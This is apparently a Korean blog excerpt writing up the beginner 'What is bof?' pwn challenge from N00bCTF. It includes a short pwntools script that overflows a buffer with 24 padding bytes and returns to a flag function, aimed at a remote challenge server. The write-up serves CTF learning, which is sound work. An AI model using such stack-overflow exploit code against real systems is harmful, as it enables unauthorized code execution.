![[Pwn] N00bCTF Pwn What is bof?](https://mblogthumb-phinf.pstatic.net/MjAyMDA2MTJfNjgg/MDAxNTkxOTM4NzE2MzE5.69ZWGM64nIzDFlEt1B3C4oZDrrydoAb2szR3gf04t-0g.RtjFR78vS59tCmkIbLjvmcXOFBldm0o31Vz4N-AhLVog.PNG.ldw0811/image.png?type=w2 "[Pwn] N00bCTF Pwn What is bof?")
1) What is bof? (100) BOF가 뭔지 물어보는 기본적인 문제이다. 우선 32bit 리눅스 실행 파일이 주어진다. 메모리 보호기법에는 NX 활성화, Partial Relro 외에 특별한 기법은 없다. (기본 문제라 그런가 보다.) 쉘 코드를 사용할 수 없으므로 바이너리 내에 호출할 수 있는 함수가 있을 것이다. (실제로 존재, flag = 0x08048516) Buffer(20) + SFP(4) + RET(0x08048516) 페이로드가 완성 되었다. // pwn1.py from pwn import * p = remote("52.79.224.215", 30005) p.recvuntil(">> ") payload = "\x90"*24 payload += p32(0x08048516) p.sendline(payload) p.interactive()...
#bof
#워게임
#wargame
#pwnable
#pwn
#overflow
#n00bctf
#ctf
#buffer
#포너블
원문링크 : [Pwn] N00bCTF Pwn What is bof?
네이버 블로그
티스토리
커뮤니티